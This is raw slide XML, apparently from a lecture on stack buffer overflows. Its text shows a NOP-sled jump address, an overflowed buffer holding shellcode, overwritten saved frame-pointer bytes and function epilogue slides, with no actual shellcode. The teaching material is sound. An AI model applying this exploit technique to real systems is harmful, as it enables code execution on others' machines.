              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - 4) &amp; 0x000000ff = 0x5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have to choose a value to jump to in the NOP range </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Say 0xbffffc74 (16 bytes within the buffer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10275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0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0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0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0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04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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overflowed Buffer Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="4648200" cy="26860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endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134596" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="47434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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134597" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="42862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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="45148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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="40576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shellcode starts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134600" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="38290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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134601" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="36004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shellcode ends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134602" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4972050"/>
            <a:ext cx="4648200" cy="22860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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134603" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3028950"/>
            <a:ext cx="1219200" cy="34290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ebp[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134604" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3028950"/>
            <a:ext cx="1219200" cy="34290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ebp[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134605" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3028950"/>
            <a:ext cx="1219200" cy="34290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ebp[2]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134606" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="3028950"/>
            <a:ext cx="1143000" cy="3429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0x5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134607" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="33718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0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134609" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4514850"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134610" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3371850"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffd60</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134611" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3600450"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffd5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1328014067"/>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5"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36646"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36647"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36648"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36649"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36651"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6652"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6653"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36654"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36655"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36656"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36657"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36658"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36659"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36660"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6661"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6662"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36663"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36664"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36667" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136659" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="4272171"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136668" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136658" idx="1"/>
            <a:endCxn id="1136662" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136669" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136657" idx="1"/>
            <a:endCxn id="1136649" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="4143375"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136670" name="Rectangle 30"/>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36671" name="Rectangle 31"/>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5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38"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33"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2139302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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data Sizes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013765" name="Picture 5" descr="wordsize"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="744438" y="2057401"/>
            <a:ext cx="7477225" cy="3778503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80715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3"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38694"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38695"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38696"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38697"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38699"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8700"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8701"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38702"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38703"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38704"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38705"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38706"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38707"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38708"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8709"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8710"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38711"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38712"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38715" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138707" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138716" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138706" idx="1"/>
            <a:endCxn id="1138710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138717" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138705" idx="1"/>
            <a:endCxn id="1138710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138718" name="Rectangle 30"/>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38719" name="Rectangle 31"/>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3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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5"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6"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33"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55290017"/>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41"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40742"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40743"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40744"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40745"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40747"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0748"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0749"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40750"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40751"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40752"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40753"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40754"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40755"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40756"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0757"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0758"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dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140759"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40760"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40763" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140755" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4900821"/>
            <a:ext cx="3886200" cy="842754"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140764" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140754" idx="1"/>
            <a:endCxn id="1140743" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48800005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140765" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140753" idx="1"/>
            <a:endCxn id="1140750" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140766" name="Rectangle 30"/>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40767" name="Rectangle 31"/>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3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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5"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6"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33"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1165177511"/>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9"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42790"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42791"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42792"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42793"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42795"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2796"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2797"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42798"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42799"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42800"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42801"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42802"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42803"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42804"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2805"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2806"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dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142807"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42808"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42811" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142803" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="5429251"/>
            <a:ext cx="3657600" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142812" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142802" idx="1"/>
            <a:endCxn id="1142791" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142813" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142801" idx="1"/>
            <a:endCxn id="1142800" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142814" name="Rectangle 30"/>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42815" name="Rectangle 31"/>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42820" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
